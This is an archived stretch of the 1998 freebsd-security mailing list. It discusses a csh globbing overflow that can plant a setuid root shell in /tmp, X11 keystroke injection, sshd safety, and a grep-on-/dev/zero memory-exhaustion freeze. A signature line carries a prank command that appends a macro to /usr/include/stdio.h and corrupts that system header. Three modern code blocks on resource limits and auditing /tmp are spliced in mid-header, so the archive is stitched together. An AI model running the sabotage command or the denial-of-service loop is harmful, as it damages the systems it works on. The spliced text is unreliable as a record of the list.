On Tue, 15 Sep 1998 13:04:43 +0200, Zahemszky Gabor wrote:

> Then as root do:
> [...]
> The bash dies... Check if there is suid shell in tmp dir:
> [debian]:~$ ls -l /tmp/sh
> -rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh

From your post, it looks as though this "root exploit" requires root privileges to action. Have I misread this? If not, I don't think that root having permission to create backdoors is a security concern.

Ciao,
Sheldon.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 09:58:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA15080 for freebsd-security-outgoing; Tue, 15 Sep 1998 09:58:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.numachi.com (numachi.numachi.com [198.175.254.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA15059 for ; Tue, 15 Sep 1998 09:58:37 -0700 (PDT) (envelope-from reichert@numachi.com) Received: (qmail 341 invoked by uid 1001); 15 Sep 1998 16:58:13 -0000 Message-ID: <19980915125813.A16613@numachi.com> Date: Tue, 15 Sep 1998 12:58:13 -0400
From: Brian Reichert To: freebsd-security@FreeBSD.ORG Subject: Re: sshd References: <35FD82A8.84601D49@dal.net> <3.0.3.32.19980915012359.006dae0c@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: <3.0.3.32.19980915012359.006dae0c@207.227.119.2>; from Jeffrey J. Mountin on Tue, Sep 15, 1998 at 01:23:59AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, Sep 15, 1998 at 01:23:59AM -0500, Jeffrey J. Mountin wrote:
> One problem is if you want to run tcp wrappers, then some services should be inetd. And need we get into certain daemons that we shouldn't run directly. I'd say use inetd for certain daemons and use wrappers.

FWIW, I'm a fan of djb's ucspi TCP client software.

http://pobox.com/~djb/ucspi-tcp.html

It does not play well with tcp wrappers, but does utilize its own allow/deny mechanism.

--
Brian 'you Bastard' Reichert reichert@numachi.com 37 Crystal Ave. #303 Current daytime number: (617)-873-4337 Derry NH 03038-1713 USA Intel architecture: the left-hand path

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 12:37:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA14708 for freebsd-security-outgoing; Tue, 15 Sep 1998 12:37:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA14658 for ; Tue, 15 Sep 1998 12:36:54 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with SMTP id PAA25410; Tue, 15 Sep 1998 15:36:28 -0400 (EDT) Date: Tue, 15 Sep 1998 15:36:27 -0400 (EDT)
From: Snob Art Genre Reply-To: ben@rosengart.com To: Jay Tribick cc: "Jason J. Horton" , security@FreeBSD.ORG Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 15 Sep 1998, Jay Tribick wrote: > The resource limits are fine for protecting against things > like fork() rabbits etc. but for some reason the above > overrides them. I just get "grep: memory exhausted" and my system is fine. This is with 3.0-current as of a few days ago. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 14:05:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02624 for freebsd-security-outgoing; Tue, 15 Sep 1998 14:05:47 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02565 for ; Tue, 15 Sep 1998 14:05:28 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id XAA28474 for freebsd-security@FreeBSD.ORG; Tue, 15 Sep 1998 23:05:04 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (VMailer, from userid 101) id 310E31511; Tue, 15 Sep 1998 22:41:30 +0200 (CEST) Date: Tue, 15 Sep 1998 22:41:30 +0200 
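What Jay and Ben are seeing differently, as an added example (my code, not grep's or FreeBSD's): a grep-style reader that must hold a whole line before it can match, pointed at /dev/zero, run under a hard address-space limit. On BSD the memoryuse knob in Jay's login class is RLIMIT_RSS, which only tells the pager which processes to take pages from; it never makes an allocation fail, and with maxproc-cur=32 the class still lets one user keep 32 growing greps alive at once. A hard cap (datasize/RLIMIT_DATA on FreeBSD; RLIMIT_AS here so the demo also runs on Linux) turns the same workload into the clean "memory exhausted" Ben reports. The 64 MB limit, the 128 MB give-up point and the function names are my choices:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <sys/wait.h>

/* A grep-style reader: it must hold a whole "line" before it can match,
 * and /dev/zero never delivers a newline, so the buffer doubles forever.
 * Returns the number of bytes held when realloc() finally returned NULL
 * (grep's "memory exhausted"), or 0 if stop_at was reached first, i.e. no
 * limit ever bit. */
static size_t grow_until_enomem(int fd, size_t stop_at)
{
    size_t cap = 1u << 20, len = 0;
    char *buf = malloc(cap);
    if (buf == NULL)
        return 0;
    for (;;) {
        ssize_t n = read(fd, buf + len, cap - len);
        if (n <= 0)
            break;                                  /* EOF or error */
        if (memchr(buf + len, '\n', (size_t)n) != NULL)
            break;                                  /* a real line ended */
        len += (size_t)n;
        if (len == cap) {
            if (cap >= stop_at) {
                free(buf);
                return 0;
            }
            char *nb = realloc(buf, cap * 2);
            if (nb == NULL) {                       /* clean failure */
                free(buf);
                return len;
            }
            buf = nb;
            cap *= 2;
        }
    }
    free(buf);
    return 0;
}

/* Run the reader in a child capped at limit_bytes of address space
 * (0 = no cap). 1: the child stopped with a clean ENOMEM; 0: it kept
 * growing to the give-up point (no effective limit) or was killed;
 * -1: setup error. */
int bounded_reader_fails_cleanly(size_t limit_bytes)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (limit_bytes != 0) {
            struct rlimit rl;
            rl.rlim_cur = rl.rlim_max = (rlim_t)limit_bytes;
            if (setrlimit(RLIMIT_AS, &rl) != 0)
                _exit(3);
        }
        int fd = open("/dev/zero", O_RDONLY);
        if (fd < 0)
            _exit(3);
        size_t held = grow_until_enomem(fd, 128u << 20);  /* give up at 128 MB */
        _exit(held != 0 ? 0 : 1);
    }
    int st;
    if (waitpid(pid, &st, 0) < 0)
        return -1;
    if (!WIFEXITED(st))
        return 0;               /* killed (e.g. by an OOM killer): not clean */
    switch (WEXITSTATUS(st)) {
    case 0:  return 1;
    case 1:  return 0;
    default: return -1;
    }
}

int main(void)
{
    int r = bounded_reader_fails_cleanly(64u << 20);
    printf("RLIMIT_AS=64MB: %s\n",
           r == 1 ? "realloc() failed cleanly, reader reported memory exhausted"
         : r == 0 ? "reader grew to the give-up point or was killed"
                  : "setup error");
    return 0;
}
```

Run it as an unprivileged user: it forks a child, caps it, and reports whether realloc() returned NULL rather than the child being killed. Pass 0 instead of a limit and the same reader just keeps growing to the give-up point, which, multiplied by the maxproc-cur in Jay's class, is the thrash he describes; the per-process cap is what makes one grep fail on its own instead of taking the box with it.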
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Subject: Re: sshd1 safety?
Message-ID: <19980915224130.A9252@keltia.freenix.fr>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.94.4i
In-Reply-To: ; from Jesse on Mon, Sep 14, 1998 at 11:09:49PM -0700
X-Operating-System: FreeBSD 3.0-CURRENT/ELF ctm#4637 AMD-K6 MMX @ 200 MHz
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to Jesse:
> I've recently been hearing about issues with the latest (and final)
> version of ssh1 that theoretically might allow remote root (or lesser)
> exploits. Is anyone aware of such issues? I did searches on various sites
> such as rootshell, but didn't find any major exploits.

To the best of my knowledge, 1.2.26 is immune to recent bugs. 1.2.24 and
below were not. I've seen nothing on Bugtraq and other places...

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #64: Fri Sep 11 23:22:44 CEST 1998

From owner-freebsd-security Tue Sep 15 14:33:24 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA10437 for freebsd-security-outgoing; Tue, 15 Sep 1998 14:33:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from indigo.ie (ts02-067.dublin.indigo.ie [194.125.134.197]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA10360 for ; Tue, 15 Sep 1998 14:33:11 -0700 (PDT) (envelope-from rotel@indigo.ie)
Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01218; Tue, 15 Sep 1998 22:25:04 +0100 (IST) (envelope-from rotel@indigo.ie)
From: Niall Smart
Message-Id: <199809152125.WAA01218@indigo.ie>
Date: Tue, 15 Sep 1998 22:25:03 +0000
In-Reply-To: <199809131615.JAA03746@cwsys.cwsent.com>; Cy Schubert - ITSD Open Systems Group
Reply-To: rotel@indigo.ie
X-Files: The truth is out there
X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96)
To: Cy Schubert - ITSD Open Systems Group , Karl Denninger
Subject: Re: X Security (was: Re: Err.. cat exploit.. (!))
Cc: Garrett Wollman , Josef Karthauser , Jay Tribick , freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Indiscriminately displaying files without terminal control enforced (ie: by
> > a pager) is EXTREMELY dangerous, especially if you're running with
> > privileges (ie: as root).
>
> That is why doing an xhost + or even an xhost hostname even to hosts
> that you think you trust is so dangerous. It is easy for someone to
> inject some "keystrokes" into an Xterm to get a root shell on a host
> that one is logged into.

Actually, xterm will not accept synthetically generated keystrokes
from XSendEvent by default, but there is nothing stopping someone
from capturing keystrokes and other events. This is a pretty
pedantic point; anyone using xhost to manage X security deserves
to get stung.

Niall
--
Niall Smart, rotel@indigo.ie.
Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 14:34:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA10774 for freebsd-security-outgoing; Tue, 15 Sep 1998 14:34:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-067.dublin.indigo.ie [194.125.134.197]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA10678 for ; Tue, 15 Sep 1998 14:34:11 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01237; Tue, 15 Sep 1998 22:27:13 +0100 (IST) (envelope-from rotel@indigo.ie) 
From: Niall Smart
Message-Id: <199809152127.WAA01237@indigo.ie>
Date: Tue, 15 Sep 1998 22:27:12 +0000
In-Reply-To: <98Sep14.144916est.40329@border.alcanet.com.au>; Peter Jeremy
Reply-To: rotel@indigo.ie
X-Files: The truth is out there
X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96)
To: Peter Jeremy , freebsd-security@FreeBSD.ORG
Subject: Re: X-security
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sep 14, 2:49pm, Peter Jeremy wrote:
} Subject: Re: X-security
> Wes Peters wrote:
> > By default, XFree86 uses "MIT MAGIC COOKIE" authentication;
> > when the server starts it creates a .Xauthority file in
> > your home directory. Anyone who can read this file will still be
> > able to connect to your X server
>
> Note that the authentication tokens are not encrypted on the network.
> Anyone who can sniff the network will also be able to connect to your
> X-server.
>
> If you're worried about someone stealing your authentication token,
> you'll need to use something like XDM-AUTHORIZATION-1 (*), SUN-DES-1 (**)
> or ssh.

After you've authenticated you're still vulnerable to snooping or
active attacks though; someone could still steal your authentication
data by desynchronising your TCP stream and injecting the right
commands. Better to use port forwarding with ssh if possible.

--
Niall Smart, rotel@indigo.ie.
Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 23:05:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA07698 for freebsd-security-outgoing; Tue, 15 Sep 1998 23:05:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id XAA07687 for ; Tue, 15 Sep 1998 23:05:04 -0700 (PDT) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zJAhi-0002bU-00; Wed, 16 Sep 1998 00:04:38 -0600 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id AAA04664; Wed, 16 Sep 1998 00:05:34 -0600 (MDT) Message-Id: <199809160605.AAA04664@harmony.village.org> To: rotel@indigo.ie Subject: Re: X Security (was: Re: Err.. cat exploit.. (!)) Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 15 Sep 1998 22:25:03 -0000." <199809152125.WAA01218@indigo.ie> References: <199809152125.WAA01218@indigo.ie> Date: Wed, 16 Sep 1998 00:05:34 -0600 
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <199809152125.WAA01218@indigo.ie> Niall Smart writes:
: Actually, xterm will not accept synthetically generated keystrokes
: from XSendEvent by default, but there is nothing stopping someone
: from capturing keystrokes and other events. This is a pretty
: pedantic point, anyone using xhost to manage X security deserves
: to get stung.

But it will accept keystrokes generated from XTEST by default. I have
a Newton keyboard I use with my Libretto which uses this feature. It
would appear that the keystroke program even works with a remote
display I can connect to, which is both way cool and a possible
nightmare from a security point of view. XTEST even supports mouse
movements and clicking, which I plan to add to the Newton keyboard
just as soon as I find a way of faking mice that I like. There are
several X extensions that can be used here that are compiled into
XFree86 by default. I think they are XInputExtension, XKEYBOARD and
XTEST, but I'm not sure about XKEYBOARD.

There is even a RECORD extension listed on my xdpyinfo output that
looks like it could be very interesting indeed.

X security is less like Swiss cheese, and more like chicken wire if
you are just using xhost for your security.
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 00:09:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA17852 for freebsd-security-outgoing; Wed, 16 Sep 1998 00:09:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA17828 for ; Wed, 16 Sep 1998 00:09:19 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA05517; Wed, 16 Sep 1998 09:08:52 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id JAA00435; Wed, 16 Sep 1998 09:07:44 +0200 (CEST) (envelope-from zgabor) 
From: Zahemszky Gabor
Message-Id: <199809160707.JAA00435@CoDe.hu>
Subject: Re: csh/bash/tcsh/others? buffer overflow
In-Reply-To: <948.905870511@axl.training.iafrica.com> from Sheldon Hearn at "Sep 15, 98 04:41:51 pm"
To: freebsd.org!freebsd-security@zg.CoDe.hu
Date: Wed, 16 Sep 1998 09:07:44 +0200 (CEST)
Cc: iafrica.com!axl@zg.CoDe.hu
X-Mailer: ELM [version 2.4ME+ PL38 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > On Tue, 15 Sep 1998 13:04:43 +0200, Zahemszky Gabor wrote:
> > > Then as root do:
> > [...]
> > The bash dies... Check if there is suid shell in tmp dir:
> > [debian]:~$ ls -l /tmp/sh
> > -rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh
>
> From your post, it looks as though this "root exploit" requires root
> privileges to action. Have I misread this? If not, I don't think that
> root having permission to create backdoors is a security concern.

OK. The short history: a local user can write the tmp-like directories
on a FreeBSD (and other Unices) machine. He can make files and
subdirectories. If, as a local user, I make a trickily named
directory structure, it's not a problem. But. If you are my sysadmin,
maybe you are the person who does the ``garbage collection'' in the
filesystem, maybe with an automatic script, maybe by hand. The problem
is that if you run only this command:

# ls /tmp
...
dXXXXXXXX 3 fuckinguser fuckinggroup ...... AAAA...................
...

it doesn't matter. Try to do:

# ls /tmp/A*

no problem, but

# ls A*/*/*/*/*

_only for looking_ into the directory, the globbing routine in csh
overflows, and wants to run the program which is the name of one of the
directories in that tree. So. Yes, to make the hole, we need root
privileges. But it _is_ a problem, much like the well-known ``mroe'' bug,
and any others. With the others, root has to make holes in his/her
environment (writeable directory, e.g. "." in his path), but with this,
he has to do normal things: ls or cd or any other. And maybe it's
automatic with a home-made csh script. Uff.

ZGabor at CoDe dot HU

--
#!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

From owner-freebsd-security Wed Sep 16 01:55:58 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05082 for freebsd-security-outgoing; Wed, 16 Sep 1998 01:55:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05074 for ; Wed, 16 Sep 1998 01:55:55 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk)
Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id JAA26852; Wed, 16 Sep 1998 09:55:33 +0100 (BST)
Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id JAA04833; Wed, 16 Sep 1998 09:55:31 +0100 (BST) (envelope-from netadmin@fastnet.co.uk)
Date: Wed, 16 Sep 1998 09:55:31 +0100 (BST)
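The hazard in the csh overflow message above is that a root operator's `ls A*/*/*/*/*` lets a local user choose the strings the shell's glob expander has to cope with. As an added example (not the poster's code, and it does not reproduce the overflow itself), the Python below audits a scratch directory with os.scandir, so no shell ever sees the names, never follows symlinks, and reports the entries that would be hostile to a hand-typed command: over-long components, deep nesting, leading dashes, whitespace, control characters, and setuid files like the planted /tmp/sh. The sample tree it builds under a temporary directory is constructed for the example, and the MAX_NAME and MAX_DEPTH thresholds are assumptions.

```python
"""Audit a world-writable scratch directory without handing its names to a shell.

Added example for the csh globbing thread; not code from the poster.  The
walker uses os.scandir (no shell, no glob), does not follow symlinks, and
flags the entries that a root operator should not touch with a hand-typed
wildcard.  Thresholds are assumptions for the example.
"""
import os
import stat
import tempfile
from typing import Iterator, List, Optional, Tuple

MAX_NAME = 64     # longer than anything a human types into ls by hand (assumption)
MAX_DEPTH = 8     # deeper than anything legitimate under a scratch directory (assumption)


def suspicious_name(name: str) -> Optional[str]:
    """Why a single path component would be hostile to a hand-typed root command."""
    if len(name) > MAX_NAME:
        return "long name"
    if name.startswith("-"):
        return "leading dash (parsed as an option by ls, rm, ...)"
    if any(ch.isspace() for ch in name):
        return "whitespace (splits into extra arguments)"
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name):
        return "control character"
    return None


def walk_no_follow(root: str, depth: int = 0) -> Iterator[Tuple[str, int, os.stat_result]]:
    """Yield (path, depth, lstat) for every entry under root; symlinks are never followed."""
    with os.scandir(root) as it:
        for entry in it:
            st = entry.stat(follow_symlinks=False)
            yield entry.path, depth + 1, st
            if entry.is_dir(follow_symlinks=False):
                yield from walk_no_follow(entry.path, depth + 1)


def audit(root: str) -> List[Tuple[str, str]]:
    """Return (path, reason) for every entry root should not touch with a glob."""
    findings = []
    for path, depth, st in walk_no_follow(root):
        reason = suspicious_name(os.path.basename(path))
        if reason:
            findings.append((path, reason))
        if depth > MAX_DEPTH:
            findings.append((path, "nested deeper than %d" % MAX_DEPTH))
        if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
            findings.append((path, "setuid/setgid file in scratch directory"))
    return findings


def build_sample_tree() -> str:
    """Constructed sample (not a real /tmp): a harmless dir, a deep chain of
    long names like the thread's AAAA.../x/x/..., and a planted setuid "sh"."""
    root = tempfile.mkdtemp(prefix="tmp-audit-")
    os.mkdir(os.path.join(root, "harmless"))
    cur = os.path.join(root, "A" * 200)
    os.mkdir(cur)
    for _ in range(10):
        cur = os.path.join(cur, "x" * 100)
        os.mkdir(cur)
    sh = os.path.join(root, "sh")
    with open(sh, "wb") as f:
        f.write(b"#!/bin/sh\n")
    os.chmod(sh, 0o4755)   # the suid shell from the quoted "ls -l /tmp/sh"
    return root


if __name__ == "__main__":
    for path, reason in audit(build_sample_tree()):
        print("%-60s %s" % (path[-60:], reason))
```

Run it as root the way you would run the cleanup script: nothing in it expands a wildcard, and the names are only ever passed to the kernel, not to a shell.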
From: Jay Tribick
X-Sender: netadmin@bofh.fast.net.uk
To: ben@rosengart.com
cc: security@FreeBSD.ORG
Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

| > The resource limits are fine for protecting against things
| > like fork() rabbits etc. but for some reason the above
| > overrides them.
|
| I just get "grep: memory exhausted" and my system is fine.
|
| This is with 3.0-current as of a few days ago.

Hmm.. I've tried it a few different ways with various restrictions and
each time it manages to completely freeze my box. Anyone else out there
tried it on a 3.0 system (I don't run 3.x on mine)?

Regards,

Jay Tribick
--
[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Wed Sep 16 06:32:21 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA10391 for freebsd-security-outgoing; Wed, 16 Sep 1998 06:32:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA10384 for ; Wed, 16 Sep 1998 06:32:19 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id JAA28148; Wed, 16 Sep 1998 09:31:52 -0400 (EDT)
Date: Wed, 16 Sep 1998 09:31:52 -0400 (EDT)
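The two `grep ohdear /dev/zero` posts above disagree about whether a per-process resource limit keeps the machine alive. As an added example (not code from either poster), the Python below forks a child, puts it under RLIMIT_AS, the address-space cap that `ulimit -v` sets in sh and that FreeBSD's login.conf calls vmemoryuse, and then has the child allocate far more than the cap, the way grep keeps growing its line buffer while /dev/zero never yields a newline. The cap and allocation sizes are assumptions; the parent is never put under the limit.

```python
"""Show what a per-process address-space limit does to a runaway allocation.

Added example for the grep /dev/zero thread; not code from either poster.
The child is capped with RLIMIT_AS (ulimit -v / vmemoryuse) and then asked
for more memory than the cap allows.  Sizes are assumptions.
"""
import os
import resource

MIB = 1024 * 1024
_CODES = {0: "allocated", 3: "memory-error", 4: "limit-not-applied"}


def run_with_memory_cap(limit_bytes: int, alloc_bytes: int) -> str:
    """Fork a child, cap its address space, make it allocate alloc_bytes.

    Returns "allocated" when the child got the memory, "memory-error" when the
    cap made malloc fail and the child died cleanly (grep's "memory exhausted"
    case), "limit-not-applied" when the cap could not be set at all, or
    "killed-by-signal" when the kernel shot the child instead, which is the
    fate of an unlimited process on a box that has run out of memory.
    """
    pid = os.fork()
    if pid == 0:                       # child: everything below runs under the cap
        code = 1
        try:
            _soft, hard = resource.getrlimit(resource.RLIMIT_AS)
            if hard != resource.RLIM_INFINITY:
                limit_bytes = min(limit_bytes, hard)   # a hard limit can only be lowered
            resource.setrlimit(resource.RLIMIT_AS, (limit_bytes, limit_bytes))
            buf = bytearray(alloc_bytes)   # zero-filled: every page is really touched
            buf[-1] = 1
            code = 0
        except MemoryError:
            code = 3
        except (ValueError, OSError):
            code = 4
        finally:
            os._exit(code)
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return "killed-by-signal"
    return _CODES.get(os.WEXITSTATUS(status), "error")


if __name__ == "__main__":
    print("1 MiB under a 1 GiB cap:", run_with_memory_cap(1024 * MIB, MIB))
    print("8 GiB under a 1 GiB cap:", run_with_memory_cap(1024 * MIB, 8192 * MIB))
```

The limit is per process, so it only bounds the tight loop in the subject line if each grep dies quickly; the number of greps the loop can have in flight is a separate limit (maxproc), and a datasize limit alone does not cover memory obtained with mmap, which is why the address-space limit is the one to set.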
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Niall Smart
cc: Peter Jeremy , freebsd-security@FreeBSD.ORG
Subject: Re: X-security
In-Reply-To: <199809152127.WAA01237@indigo.ie>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 15 Sep 1998, Niall Smart wrote:

> > Note that the authentication tokens are not encrypted on the network.
> > Anyone who can sniff the network will also be able to connect to your
> > X-server.
> >
> > If you're worried about someone stealing your authentication token,
> > you'll need to use something like XDM-AUTHORIZATION-1 (*), SUN-DES-1 (**)
> > or ssh.
>
> After you've authenticated you're still vulnerable to snooping or
> active attacks though, someone could still steal your authentication
> data by desynchronising your TCP stream and injecting the right
> commands. Better to use port forwarding with ssh if possible.

I personally like this arrangement:

Xnest :1 -auth /xauth/randomauthfile
xterm -display :1 -e slogin -l username hostname

This restricts X programs coming from a remote untrusted host to a
particular Xnest. No doubt there are some problems with this (due to the
flakiness of Xnest, etc), but this can be fairly effective against
observers from untrusted hosts. With ssh going, you prevent on-the-wire
and joe-user-on-the-remote-host attacks (as ssh maintains the encryption
and .Xauthority key). With Xnest you limit the scope of someone who has
managed to get access to your tunnel or the display key (like root on
the remote system).

Robert N Watson
Carnegie Mellon University http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 06:57:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA14550 for freebsd-security-outgoing; Wed, 16 Sep 1998 06:57:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from nak.myhouse.com (nak.myhouse.com [209.70.45.162]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA14545 for ; Wed, 16 Sep 1998 06:57:17 -0700 (PDT) (envelope-from zoonie@myhouse.com) Received: from localhost (zoonie@localhost) by nak.myhouse.com (8.8.8/8.8.7) with ESMTP id JAA19306; Wed, 16 Sep 1998 09:56:01 -0400 (EDT) (envelope-from zoonie@myhouse.com) X-Authentication-Warning: nak.myhouse.com: zoonie owned process doing -bs Date: Wed, 16 Sep 1998 09:56:01 -0400 (EDT) 
From: zoonie
To: Warner Losh
cc: rotel@indigo.ie, freebsd-security@FreeBSD.ORG
Subject: Re: X Security (was: Re: Err.. cat exploit.. (!))
In-Reply-To: <199809160605.AAA04664@harmony.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Warner is correct about XTEST; if you look at a2x it does this also. In
